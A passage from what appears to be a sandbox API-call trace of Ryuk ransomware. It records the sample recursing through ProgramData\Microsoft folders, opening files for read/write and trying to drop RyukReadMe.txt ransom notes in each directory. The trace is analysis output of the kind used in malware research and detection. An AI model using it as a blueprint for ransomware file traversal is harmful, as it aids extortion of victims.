(in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0140.590] SetLastError (dwErrCode=0x0) [0140.590] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.590] GetLastError () returned 0x5 [0140.590] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.590] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.590] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico", dwFileAttributes=0x80) returned 0 [0140.590] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.591] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.591] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", dwFileAttributes=0x80) returned 0 [0140.591] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.591] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.591] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", dwFileAttributes=0x80) returned 0 [0140.591] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.592] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.592] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.592] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.592] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", dwFileAttributes=0x80) returned 0 [0140.592] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.593] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.593] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.593] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", dwFileAttributes=0x80) returned 0 [0140.593] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.593] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.593] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.594] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", dwFileAttributes=0x80) returned 0 [0140.594] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.594] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.594] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x80) returned 0 [0140.594] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.595] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.595] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.595] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0140.595] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.595] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.595] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.595] SetLastError (dwErrCode=0x0) [0140.595] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.595] GetLastError () returned 0x5 [0140.595] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.595] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.595] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.596] SetLastError (dwErrCode=0x0) [0140.596] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.596] GetLastError () returned 0x5 [0140.596] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.596] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.596] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.596] SetLastError (dwErrCode=0x0) [0140.596] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.596] GetLastError () returned 0x5 [0140.596] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.596] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.596] SetLastError (dwErrCode=0x0) [0140.596] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.596] GetLastError () returned 0x5 [0140.596] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.596] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.597] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.597] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.597] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.597] SetLastError (dwErrCode=0x0) [0140.597] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\DeviceSync\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\devicesync\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.597] GetLastError () returned 0x0 [0140.598] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0140.598] CloseHandle (hObject=0x184) returned 1 [0140.598] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.598] SetLastError (dwErrCode=0x0) [0140.599] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.599] GetLastError () returned 0x5 [0140.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.599] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.599] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.599] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.599] SetLastError (dwErrCode=0x0) [0140.599] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\DRM\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\drm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.599] GetLastError () returned 0x5 [0140.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.599] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.599] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.599] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.599] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.600] SetLastError (dwErrCode=0x0) [0140.600] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\DRM\\Server\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\drm\\server\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.600] GetLastError () returned 0x5 [0140.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.600] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.600] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.600] SetLastError (dwErrCode=0x0) [0140.600] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\DRM\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\drm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.600] GetLastError () returned 0x5 [0140.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.600] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.600] SetLastError (dwErrCode=0x0) [0140.600] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.600] GetLastError () returned 0x5 [0140.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.600] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.600] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.601] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.601] SetLastError (dwErrCode=0x0) [0140.601] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\eHome\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.601] GetLastError () returned 0x0 [0140.601] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.602] CloseHandle (hObject=0x188) returned 1 [0140.602] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.602] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.602] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.602] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.602] SetLastError (dwErrCode=0x0) [0140.602] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\eHome\\logs\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\logs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.603] GetLastError () returned 0x0 [0140.603] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.604] CloseHandle (hObject=0x188) returned 1 [0140.604] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.604] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.604] SetLastError (dwErrCode=0x0) [0140.604] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\eHome\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.604] GetLastError () returned 0xb7 [0140.604] CloseHandle (hObject=0x184) returned 1 [0140.604] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.604] SetLastError (dwErrCode=0x0) [0140.604] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.604] GetLastError () returned 0x5 [0140.604] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.604] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.605] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.605] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.605] SetLastError (dwErrCode=0x0) [0140.605] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.605] GetLastError () returned 0x5 [0140.605] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.605] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.605] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.606] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.606] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.606] SetLastError (dwErrCode=0x0) [0140.606] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.606] GetLastError () returned 0x5 [0140.606] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.606] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.606] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.606] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.606] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.606] SetLastError (dwErrCode=0x0) [0140.606] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.607] GetLastError () returned 0x5 [0140.607] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.607] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.607] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.607] FindClose (in: 